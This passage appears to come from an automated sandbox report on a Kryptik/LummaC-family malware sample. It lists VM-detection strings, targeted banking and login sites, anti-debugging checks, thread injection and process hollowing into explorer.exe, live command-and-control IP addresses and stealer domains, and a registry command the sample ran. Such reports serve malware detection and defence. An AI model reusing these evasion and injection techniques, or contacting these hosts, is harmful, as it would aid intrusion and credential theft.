Source: explorer.exe, 00000027.00000002.2637291810.0000000009377000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}aPNyua.exe/
Source: explorer.exe, 00000027.00000003.2093843618.000000000B17E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00`
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: explorer.exe, 00000002.00000000.1431282200.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.1430666341.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: explorer.exe, 00000027.00000003.2076060809.00000000049D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: explorer.exe, 00000027.00000002.2625226237.00000000049FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: explorer.exe, 00000002.00000000.1431282200.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}?
Source: explorer.exe, 00000002.00000000.1430666341.000000000952D000.00000004.00000001.00020000.00000000.sdmp, 1601.exe, 00000009.00000002.1747762980.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000009.00000002.1747762980.0000000000765000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2621304334.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2621304334.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2620858851.00000000007B4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837286837.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1885551963.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: explorer.exe, 00000027.00000003.2094077748.00000000093DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: 1601.exe, 00000009.00000002.1747762980.0000000000765000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWb
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: 455F.exe, 00000014.00000002.2019271007.00000000014BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpZQ
Source: explorer.exe, 00000027.00000003.2076060809.00000000049D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: explorer.exe, 00000002.00000000.1427348032.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000o;
Source: 1601.exe, 00000009.00000002.1747762980.0000000000749000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y8
Source: explorer.exe, 00000027.00000002.2637291810.0000000009377000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}aPNyua.exeO
Source: explorer.exe, 00000002.00000000.1431282200.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTbrVMWare
Source: explorer.exe, 00000027.00000002.2637291810.0000000009377000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}aPNyua.exe
Source: explorer.exe, 00000027.00000003.2053341050.0000000009166000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00
Source: build2.exe, 00000013.00000002.2289169200.00000000009B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: explorer.exe, 00000027.00000002.2635780083.0000000009166000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000006
Source: explorer.exe, 00000002.00000000.1430666341.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: %SystemRoot%\system32\mswsock.dlldRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: explorer.exe, 00000027.00000002.2642416965.000000000B0CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00U}
Source: explorer.exe, 00000002.00000000.1431282200.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.1428012829.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: explorer.exe, 00000027.00000003.2093843618.000000000B17E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: explorer.exe, 00000027.00000003.2010060784.000000000904C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: 1601.exe, 00000011.00000002.2620858851.0000000000728000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: explorer.exe, 00000002.00000000.1430666341.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: )d2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A3D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696501413p
Source: explorer.exe, 00000002.00000000.1427348032.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;
Source: explorer.exe, 00000027.00000003.2309496667.00000000092B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000027.00000002.2617948795.0000000000E03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000~2L{
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: explorer.exe, 00000027.00000003.2064164367.00000000049F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTESS~VMWare
Source: explorer.exe, 00000027.00000002.2617948795.0000000000E03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1601.exe, 00000011.00000002.2620858851.00000000007B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: explorer.exe, 00000027.00000003.2094077748.0000000009426000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000027.00000003.2100664635.000000000B1CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@J
Source: explorer.exe, 00000027.00000003.2010060784.000000000904C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@ Ap{
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: explorer.exe, 00000027.00000003.2086184859.000000000B136000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:77
Source: 455F.exe, 00000014.00000003.1910934821.0000000003A37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f
Source: explorer.exe, 00000027.00000002.2617948795.0000000000E03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Users\user\AppData\Local\Temp\1601.exe

API call chain: ExitProcess graph end node

graph_9-42952

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 8_2_048B671C rdtsc

8_2_048B671C

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 9_2_00424168 _memset,IsDebuggerPresent,

9_2_00424168

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 9_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

9_2_0042A57A

Source: C:\Users\user\AppData\Local\Temp\1601.exe

9_2_00412220

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02CF0D90 mov eax, dword ptr fs:[00000030h]	0_2_02CF0D90
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02CF092B mov eax, dword ptr fs:[00000030h]	0_2_02CF092B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02F5B0D4 push dword ptr fs:[00000030h]	0_2_02F5B0D4
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_02CF0D90 mov eax, dword ptr fs:[00000030h]	4_2_02CF0D90
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_02CF092B mov eax, dword ptr fs:[00000030h]	4_2_02CF092B
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_02EDACF4 push dword ptr fs:[00000030h]	4_2_02EDACF4
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_048B50A3 push dword ptr fs:[00000030h]	8_2_048B50A3
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04950042 push dword ptr fs:[00000030h]	8_2_04950042
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_02E890A3 push dword ptr fs:[00000030h]	13_2_02E890A3
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E0042 push dword ptr fs:[00000030h]	13_2_048E0042

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 9_2_004278D5 GetProcessHeap,

9_2_004278D5

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		9_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_004329BB SetUnhandledExceptionFilter,		9_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: fcbhtea.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 193.106.175.76 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.217.238 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.159.133.233 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.249.187.165 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.16.114 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.23.232.80 80	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 8_2_04950110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

8_2_04950110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Thread created: C:\Windows\explorer.exe EIP: AF19A0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Thread created: unknown EIP: 86B19A0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Memory written: C:\Users\user\AppData\Local\Temp\1601.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Memory written: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Memory written: C:\Users\user\AppData\Local\Temp\1601.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Memory written: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Memory written: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Memory written: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Memory written: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: 455F.exe, 00000014.00000002.1999723958.0000000000196000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: associationokeo.shop
Source: 455F.exe, 00000014.00000002.1999723958.0000000000196000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: turkeyunlikelyofw.shop
Source: 455F.exe, 00000014.00000002.1999723958.0000000000196000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: pooreveningfuseor.pw
Source: 455F.exe, 00000014.00000002.1999723958.0000000000196000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: edurestunningcrackyow.fun
Source: 455F.exe, 00000014.00000002.1999723958.0000000000196000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: detectordiscusser.shop
Source: 455F.exe, 00000014.00000002.1999723958.0000000000196000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: problemregardybuiwo.fun
Source: 455F.exe, 00000014.00000002.1999723958.0000000000196000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: lighterepisodeheighte.fun
Source: 455F.exe, 00000014.00000002.1999723958.0000000000196000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: technologyenterdo.shop
Source: 455F.exe, 00000014.00000002.1999723958.0000000000196000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: resergvearyinitiani.shop

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Section unmapped: unknown base address: 400000

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 9_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

9_2_00419F90

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\Temp\1601.exe C:\Users\user\AppData\Local\Temp\1601.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe --Task	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\Temp\1601.exe "C:\Users\user\AppData\Local\Temp\1601.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe"
